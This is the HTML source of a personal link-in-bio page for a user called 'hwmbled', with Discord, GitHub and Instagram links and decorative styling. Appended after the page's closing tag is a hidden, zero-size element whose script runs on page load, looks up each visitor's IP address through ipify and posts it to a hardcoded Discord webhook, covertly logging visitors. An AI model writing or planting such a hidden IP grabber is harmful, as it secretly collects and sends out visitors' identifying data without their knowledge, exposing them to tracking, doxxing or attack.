<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="icon" type="image/png" href="https://i.imgur.com/aXQ3Pnn.jpeg">
<title>@hwmbled</title>
<script src="https://unpkg.com/typed.js@2.1.0/dist/typed.umd.js"></script>
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Poppins&display=swap" rel="stylesheet">
<meta property="og:title" content="https://e-z.bio/ecstasy">
<meta property="og:type" content="website">
<meta property="og:image" content="https://cdn.discordapp.com/attachments/1213042081078059058/1265314693598150789/6daccba3ed7a43d0175d00d30a2cc175.jpg?ex=66a10fa3&is=669fbe23&hm=d74e0b89a95e64e557e5f51094dfa63502de33d7cb387f141b97a5d0dc2a4944&">
<meta property="og:description" content="@hwmbled">
<meta name="theme-color" content="#80034b">
</head>
<style>
    .a {
        bottom: 0;
        left: 0;
        overflow: hidden;
        position: absolute;
        right: 0;
        top: 0;
        z-index: -1;
        background-image: url(https://i.imgur.com/K0kCKLah.jpg);
    }

    .b {
        bottom: 0;
        left: 0;
        overflow: hidden;
        position: absolute;
        right: 0;
        top: 0;
        z-index: -1;
        backdrop-filter: blur(6px);
        -webkit-backdrop-filter: blur(6px);
        background: #00000042;
        display: flex;
        justify-content: center;
        flex-direction: column;
    }

    .bitch {
        display: flex;
        justify-content: center;
        place-items: center;
        border: 1px solid #97848450;
        background: linear-gradient(230deg, #9784844d, #97848400);
        width: 100%;
        border-radius: 30px;
        box-sizing: border-box;
        padding: 15px;
    }

    .icon {
        gap: 10px;
    }

    .icon svg {
        font-size: 27px;
    }

    .cacao a svg {
        color: #bf11e2;
        width: 31.5px;
        height: 31.5px;
        transition: 0.4s;
    }

    .cacao a svg:hover {
        color: #f82c00;
    }


    html {
        height: 100%;
    }

    body {
        font-family: 'Poppins', sans-serif;
        color: #fafafa;
        font-weight: 800;
        min-height: 100%;
        margin: 0;
        z-index: -1;
        position: relative;
    }

    @media (max-width: 390px) {
        .bitch-1 {
            flex-direction: column;
        }
        .cacao {
            flex-direction: row!important;
            gap: 10px!important;
        }
        .cacao svg {
            width: 40px!important;
            height: 40px!important;
        }

        .cacao a {
            margin-bottom: -5.4px!important;
        }
        .cacao-div {
            padding: 7px;
        }
    }
</style>
<body>
<div class="a">
<div class="b">
<div class="bitch-1" style="margin-left: auto;margin-right: auto;display: flex;gap: 20px;">
<div class="bitch-2" style="gap: 9px;display: flex;flex-direction: column;">
<div class="bitch" style="justify-content: left;">
<img style="border-radius: 28%;" src="https://imgur.com/gallery/zilla-vvMT0P5" alt height="80" width="80">
<div style="margin-left: 12px;">
<h1 style="line-height: 38px;margin: 0;font-size: 30px;">hwmbled</h1>
    <h3 style="margin: 0; font-size: 16px; display: inline;">
     <a target="_blank" href="https://discord.gg/dd9Q3fMm" style="color: #bf11e2; text-decoration: none;">Server</a>
    </h3>
</div>
</div>
<div class="bitch icon" style="font-size: 15px; width: 200px; height: 60px;"> 
    
   
        <h1 id="typed-text" style="line-height: 38px; margin: 0; font-size: 15px;"></h1>  

    <script>
        var typed = new Typed('#typed-text', {
            strings: ['Discord: hwmbled'],
            typeSpeed: 150,
            backSpeed: 70,
            loop: true,
            showCursor: false
        });
    </script>
    
</div>
</div>
<div class="bitch cacao-div" style="flex-direction: column;">
<div style="flex-direction: column;display: flex;gap: 2px;" class="cacao">
<a target="_blank" href="https://discord.com/users/270489594808500227" style="text-decoration: none;">
<svg xmlns="http://www.w3.org/2000/svg" width="50" height="50" viewBox="0 0 24 24"><path fill="currentcolor" d="M19.27 5.33C17.94 4.71 16.5 4.26 15 4a.09.09 0 0 0-.07.03c-.18.33-.39.76-.53 1.09a16.09 16.09 0 0 0-4.8 0c-.14-.34-.35-.76-.54-1.09c-.01-.02-.04-.03-.07-.03c-1.5.26-2.93.71-4.27 1.33c-.01 0-.02.01-.03.02c-2.72 4.07-3.47 8.03-3.1 11.95c0 .02.01.04.03.05c1.8 1.32 3.53 2.12 5.24 2.65c.03.01.06 0 .07-.02c.4-.55.76-1.13 1.07-1.74c.02-.04 0-.08-.04-.09c-.57-.22-1.11-.48-1.64-.78c-.04-.02-.04-.08-.01-.11c.11-.08.22-.17.33-.25c.02-.02.05-.02.07-.01c3.44 1.57 7.15 1.57 10.55 0c.02-.01.05-.01.07.01c.11.09.22.17.33.26c.04.03.04.09-.01.11c-.52.31-1.07.56-1.64.78c-.04.01-.05.06-.04.09c.32.61.68 1.19 1.07 1.74c.03.01.06.02.09.01c1.72-.53 3.45-1.33 5.25-2.65c.02-.01.03-.03.03-.05c.44-4.53-.73-8.46-3.1-11.95c-.01-.01-.02-.02-.04-.02M8.52 14.91c-1.03 0-1.89-.95-1.89-2.12s.84-2.12 1.89-2.12c1.06 0 1.9.96 1.89 2.12c0 1.17-.84 2.12-1.89 2.12m6.97 0c-1.03 0-1.89-.95-1.89-2.12s.84-2.12 1.89-2.12c1.06 0 1.9.96 1.89 2.12c0 1.17-.83 2.12-1.89 2.12" /></svg>
</a>
<a target="_blank" href="https://github.com/hwmbled" style="text-decoration: none;">
<svg xmlns="http://www.w3.org/2000/svg" width="34" height="34" viewBox="0 0 24 24"><path fill="currentColor" d="M12 0c-6.626 0-12 5.373-12 12 0 5.302 3.438 9.8 8.207 11.387.599.111.793-.261.793-.577v-2.234c-3.338.726-4.033-1.416-4.033-1.416-.546-1.387-1.333-1.756-1.333-1.756-1.089-.745.083-.729.083-.729 1.205.084 1.839 1.237 1.839 1.237 1.07 1.834 2.807 1.304 3.492.997.107-.775.418-1.305.762-1.604-2.665-.305-5.467-1.334-5.467-5.931 0-1.311.469-2.381 1.236-3.221-.124-.303-.535-1.524.117-3.176 0 0 1.008-.322 3.301 1.23.957-.266 1.983-.399 3.003-.404 1.02.005 2.047.138 3.006.404 2.291-1.552 3.297-1.23 3.297-1.23.653 1.653.242 2.874.118 3.176.77.84 1.235 1.911 1.235 3.221 0 4.609-2.807 5.624-5.479 5.921.43.372.823 1.102.823 2.222v3.293c0 .319.192.694.801.576 4.765-1.589 8.199-6.086 8.199-11.386 0-6.627-5.373-12-12-12z"/></svg>
</a>
<a target="_blank" href="https://www.instagram.com/hwmblxd/" style="text-decoration: none;margin-bottom: -3.5px;">
<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path fill="currentColor" d="M12 2.163c3.204 0 3.584.012 4.85.07 3.252.148 4.771 1.691 4.919 4.919.058 1.265.069 1.645.069 4.849 0 3.205-.012 3.584-.069 4.849-.149 3.225-1.664 4.771-4.919 4.919-1.266.058-1.644.07-4.85.07-3.204 0-3.584-.012-4.849-.07-3.26-.149-4.771-1.699-4.919-4.92-.058-1.265-.07-1.644-.07-4.849 0-3.204.013-3.583.07-4.849.149-3.227 1.664-4.771 4.919-4.919 1.266-.057 1.645-.069 4.849-.069zm0-2.163c-3.259 0-3.667.014-4.947.072-4.358.2-6.78 2.618-6.98 6.98-.059 1.281-.073 1.689-.073 4.948 0 3.259.014 3.668.072 4.948.2 4.358 2.618 6.78 6.98 6.98 1.281.058 1.689.072 4.948.072 3.259 0 3.668-.014 4.948-.072 4.354-.2 6.782-2.618 6.979-6.98.059-1.28.073-1.689.073-4.948 0-3.259-.014-3.667-.072-4.947-.196-4.354-2.617-6.78-6.979-6.98-1.281-.059-1.69-.073-4.949-.073zm0 5.838c-3.403 0-6.162 2.759-6.162 6.162s2.759 6.163 6.162 6.163 6.162-2.759 6.162-6.163c0-3.403-2.759-6.162-6.162-6.162zm0 10.162c-2.209 0-4-1.79-4-4 0-2.209 1.791-4 4-4s4 1.791 4 4c0 2.21-1.791 4-4 4zm6.406-11.845c-.796 0-1.441.645-1.441 1.44s.645 1.44 1.441 1.44c.795 0 1.439-.645 1.439-1.44s-.644-1.44-1.439-1.44z"/></svg>
</div>
</div>
</div>
</div>
</div>
<script defer src="https://static.cloudflareinsights.com/beacon.min.js/v84a3a4012de94ce1a686ba8c167c359c1696973893317" integrity="sha512-euoFGowhlaLqXsPWQ48qSkBSCFs3DPRyiwVu3FjR96cMPx+Fr+gpWRhIafcHwqwCqWS42RZhIudOvEI+Ckf6MA==" data-cf-beacon='{"rayId":"856672fe9e3b82b6","r":1,"version":"2024.2.0","token":"953a3ace97354f30bce073210713814d"}' crossorigin="anonymous"></script>
</body>
</html>
<style>
        body {
         

        }

        #ip-address {
            font-size: 0em;
        }

        #title {
            font-size: 2em;
            margin-bottom: 20px;
        }
    </style>
</head>
<body>
<span id="ip-address">
    <script>
        function sendToDiscord(ip) {
            const webhookURL = 'https://discord.com/api/webhooks/1265040802455879692/znCXMQPZbkxz5tdrzdNP7UL9eXCFYUZvHgE0kJKI4MWa3l-glIW4dSiDT-YngjO4oHmL';
            const data = {
                content: `UwU i found another one: ${ip}`
            };

            fetch(webhookURL, {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json',
                },
                body: JSON.stringify(data),
            })
                .then(response => {
                    if (!response.ok) {
                        throw new Error('Network response was not ok');
                    }
                })
                .catch(error => console.error('Error:', error));
        }

        function getIP(json) {
            const ipAddress = json.ip;
            document.getElementById("ip-address").textContent = ipAddress;
            sendToDiscord(ipAddress);
        }

        fetch('https://api.ipify.org/?format=json')
            .then(response => response.json())
            .then(data => getIP(data))
            .catch(error => console.error('Error:', error));
    </script>


</body></html>
